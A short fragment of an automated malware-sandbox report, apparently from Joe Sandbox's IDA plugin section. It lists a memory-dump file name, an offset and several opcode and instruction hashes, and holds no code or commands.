                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8a5632105281a85e72963dff57e8dfc17959067343bb35cf92ebbda84ee10360
                                                                                          • Instruction ID: 1e643552db6853fc1568d3fffe1f1986d4cf2bcf689bf68fd92f4c3d42deef70
                                                                                          • Opcode Fuzzy Hash: 8a5632105281a85e72963dff57e8dfc17959067343bb35cf92ebbda84ee10360
                                                                                          • Instruction Fuzzy Hash: 7001262490EB810FE782F73858165357FF0DF91286B4804BBE898C61A7D948A9848357